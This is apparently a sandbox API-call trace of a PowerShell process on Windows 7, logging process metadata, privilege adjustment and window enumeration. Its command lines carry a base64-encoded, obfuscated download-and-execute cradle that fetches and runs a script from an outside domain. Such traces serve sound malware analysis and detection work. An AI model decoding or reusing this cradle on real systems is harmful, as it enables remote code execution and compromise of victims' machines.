	[0418.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0x1c70da60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39
	[0418.613] SetErrorMode (uMode=0x1) returned 0x1
	[0418.613] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c70dc70 | out: lpFileInformation=0x1c70dc70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82dd7f7c, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x82dd7f7c, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xe84fc9b0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x73a00)) returned 1
	[0418.613] SetErrorMode (uMode=0x1) returned 0x1
	[0418.614] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.614] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.614] CoTaskMemFree (pv=0x1480e0) 
	[0418.616] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.616] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.616] CoTaskMemFree (pv=0x1480e0) 
	[0418.619] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.619] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.619] CoTaskMemFree (pv=0x1480e0) 
	[0418.629] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.629] CoTaskMemFree (pv=0x1480e0) 
	[0418.956] CoTaskMemAlloc (cb=0x3b) returned 0x1b793a30
	[0418.956] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c70de58, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c70de58) returned 0x4550
	[0418.957] CoTaskMemFree (pv=0x1b793a30) 
	[0418.960] GetConsoleWindow () returned 0x102c4
	[0418.968] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.968] CoTaskMemFree (pv=0x1480e0) 
	[0418.969] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.969] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0418.969] CoTaskMemFree (pv=0x1480e0) 
	[0418.974] CoTaskMemAlloc (cb=0x104) returned 0x1480e0
	[0418.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1480e0, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0418.974] CoTaskMemFree (pv=0x1480e0) 
	[0418.976] CommandLineToArgvW (in: lpCmdLine=" -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", pNumArgs=0x1c70dea0 | out: pNumArgs=0x1c70dea0) returned 0x1b796400*=""
	[0418.978] lstrlenW (lpString="-EncodedCommand") returned 15
	[0418.978] CoTaskMemAlloc (cb=0x22) returned 0x1b78d6b0
	[0418.978] RtlMoveMemory (in: Destination=0x1b78d6b0, Source=0x1b796422, Length=0x20 | out: Destination=0x1b78d6b0) 
	[0418.978] CoTaskMemFree (pv=0x1b78d6b0) 
	[0418.978] lstrlenW (lpString="JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==") returned 376
	[0418.978] CoTaskMemAlloc (cb=0x2f4) returned 0x1b796740
	[0418.978] RtlMoveMemory (in: Destination=0x1b796740, Source=0x1b796442, Length=0x2f2 | out: Destination=0x1b796740) 
	[0418.979] CoTaskMemFree (pv=0x1b796740) 
	[0418.979] LocalFree (hMem=0x1b796400) returned 0x0
	[0418.980] CoTaskMemAlloc (cb=0x804) returned 0x1b796400
	[0418.980] GetConsoleTitleW (in: lpConsoleTitle=0x1b796400, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0419.628] CoTaskMemFree (pv=0x1b796400) 
	[0419.637] CoTaskMemAlloc (cb=0x38e) returned 0x1b796400
	[0419.637] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x1c70de00*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x310fb50 | out: lpCommandLine="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"  -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA==", lpProcessInformation=0x310fb50*(hProcess=0x374, hThread=0x370, dwProcessId=0xfe0, dwThreadId=0xb70)) returned 1
	[0419.641] CoTaskMemFree (pv=0x1b796400) 
	[0419.642] CloseHandle (hObject=0x370) returned 1
	[0419.642] CoTaskMemAlloc (cb=0x3b) returned 0x1b793a30
	[0419.642] SHGetFileInfoA (in: pszPath="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwFileAttributes=0x0, psfi=0x1c70dea8, cbFileInfo=0x168, uFlags=0x2000 | out: psfi=0x1c70dea8) returned 0x4550
	[0419.643] CoTaskMemFree (pv=0x1b793a30) 
	[0419.646] GetCurrentProcess () returned 0xffffffffffffffff
	[0419.646] GetCurrentProcess () returned 0xffffffffffffffff
	[0419.647] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x374, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x1c70df88, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1c70df88*=0x370) returned 1

Process:
	id = "26"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x1c57c000"
	os_pid = "0xb00"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 140
	os_tid = 0xb04

	[0361.721] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0362.060] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0362.060] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0362.060] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0362.060] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0363.262] GetVersionExW (in: lpVersionInformation=0x24d9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d9a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0363.264] GetVersionExW (in: lpVersionInformation=0x24d9a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d9a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0363.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0363.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d660, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0363.417] GetVersionExW (in: lpVersionInformation=0x24d710*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d710*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0363.418] SetErrorMode (uMode=0x1) returned 0x1
	[0363.419] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24d870 | out: lpFileInformation=0x24d870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0363.420] SetErrorMode (uMode=0x1) returned 0x1
	[0363.423] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24dae0 | out: lpdwHandle=0x24dae0) returned 0x94c
	[0363.425] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2b072d8 | out: lpData=0x2b072d8) returned 1
	[0363.427] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24da58, puLen=0x24da50 | out: lplpBuffer=0x24da58*=0x2b07374, puLen=0x24da50) returned 1
	[0363.429] lstrlenW (lpString="䅁") returned 1
	[0363.438] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b07450, puLen=0x24d9c0) returned 1
	[0363.439] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0363.440] CoTaskMemAlloc (cb=0x2e) returned 0x158300
	[0363.441] lstrcpyW (in: lpString1=0x158300, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0363.441] CoTaskMemFree (pv=0x158300) 
	[0363.441] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b074a4, puLen=0x24d9c0) returned 1
	[0363.441] lstrlenW (lpString="System.Management.Automation") returned 28
	[0363.442] CoTaskMemAlloc (cb=0x3c) returned 0x99950
	[0363.442] lstrcpyW (in: lpString1=0x99950, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0363.442] CoTaskMemFree (pv=0x99950) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b07500, puLen=0x24d9c0) returned 1
	[0363.442] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0363.442] CoTaskMemAlloc (cb=0x20) returned 0x162ed0
	[0363.442] lstrcpyW (in: lpString1=0x162ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0363.442] CoTaskMemFree (pv=0x162ed0) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b07540, puLen=0x24d9c0) returned 1
	[0363.442] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0363.442] CoTaskMemAlloc (cb=0x44) returned 0x99950
	[0363.442] lstrcpyW (in: lpString1=0x99950, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0363.442] CoTaskMemFree (pv=0x99950) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b075a8, puLen=0x24d9c0) returned 1
	[0363.442] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0363.442] CoTaskMemAlloc (cb=0x76) returned 0x100040
	[0363.442] lstrcpyW (in: lpString1=0x100040, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0363.442] CoTaskMemFree (pv=0x100040) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b07644, puLen=0x24d9c0) returned 1
	[0363.442] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0363.442] CoTaskMemAlloc (cb=0x44) returned 0x99950
	[0363.442] lstrcpyW (in: lpString1=0x99950, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0363.442] CoTaskMemFree (pv=0x99950) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b076a8, puLen=0x24d9c0) returned 1
	[0363.442] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0363.442] CoTaskMemAlloc (cb=0x58) returned 0x124ff0
	[0363.442] lstrcpyW (in: lpString1=0x124ff0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0363.442] CoTaskMemFree (pv=0x124ff0) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b07724, puLen=0x24d9c0) returned 1
	[0363.442] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0363.442] CoTaskMemAlloc (cb=0x20) returned 0x162ed0
	[0363.442] lstrcpyW (in: lpString1=0x162ed0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0363.442] CoTaskMemFree (pv=0x162ed0) 
	[0363.442] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x2b073cc, puLen=0x24d9c0) returned 1
	[0363.443] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0363.443] CoTaskMemAlloc (cb=0x66) returned 0x14b0b0
	[0363.443] lstrcpyW (in: lpString1=0x14b0b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0363.443] CoTaskMemFree (pv=0x14b0b0) 
	[0363.443] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x0, puLen=0x24d9c0) returned 0
	[0363.443] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x0, puLen=0x24d9c0) returned 0
	[0363.443] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24d9c8, puLen=0x24d9c0 | out: lplpBuffer=0x24d9c8*=0x0, puLen=0x24d9c0) returned 0
	[0363.443] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24d998, puLen=0x24d990 | out: lplpBuffer=0x24d998*=0x2b07374, puLen=0x24d990) returned 1
	[0363.444] CoTaskMemAlloc (cb=0x204) returned 0x1029d0
	[0363.444] VerLanguageNameW (in: wLang=0x0, szLang=0x1029d0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0363.445] CoTaskMemFree (pv=0x1029d0) 
	[0363.445] VerQueryValueW (in: pBlock=0x2b072d8, lpSubBlock="\\", lplpBuffer=0x24d9e8, puLen=0x24d9e0 | out: lplpBuffer=0x24d9e8*=0x2b07300, puLen=0x24d9e0) returned 1
	[0363.450] GetCurrentProcessId () returned 0xb00
	[0363.578] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24c910 | out: lpLuid=0x24c910*(LowPart=0x14, HighPart=0)) returned 1
	[0363.581] GetCurrentProcess () returned 0xffffffffffffffff
	[0363.581] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x24c930 | out: TokenHandle=0x24c930*=0x2ec) returned 1
	[0363.582] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2b0ab50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0363.584] CloseHandle (hObject=0x2ec) returned 1
	[0363.588] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb00) returned 0x2ec
	[0363.597] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2b0abb8, cb=0x200, lpcbNeeded=0x24d948 | out: lphModule=0x2b0abb8, lpcbNeeded=0x24d948) returned 1
	[0363.599] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13f370000, lpmodinfo=0x2b0ae28, cb=0x18 | out: lpmodinfo=0x2b0ae28*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0363.600] CoTaskMemAlloc (cb=0x804) returned 0x165480
	[0363.600] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13f370000, lpBaseName=0x165480, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0363.600] CoTaskMemFree (pv=0x165480) 
	[0363.601] CoTaskMemAlloc (cb=0x804) returned 0x165480
	[0363.601] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13f370000, lpFilename=0x165480, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0363.601] CoTaskMemFree (pv=0x165480) 
	[0363.602] CloseHandle (hObject=0x2ec) returned 1
	[0363.827] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xb00) returned 0x2ec
	[0363.828] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x24da78 | out: lpExitCode=0x24da78*=0x103) returned 1
	[0363.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b0b088, Length=0x20000, ResultLength=0x24da40 | out: SystemInformation=0x12b0b088, ResultLength=0x24da40*=0x1dee0) returned 0x0
	[0363.850] EnumWindows (lpEnumFunc=0x2a866ac, lParam=0x0) returned 1
	[0363.851] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.851] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x558
	[0363.851] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.851] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.851] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x538
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x778
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x778
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.852] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x460
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
	[0363.853] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0x24d7a0 | out: lpdwProcessId=0x24d7a0) returned 0x4d0
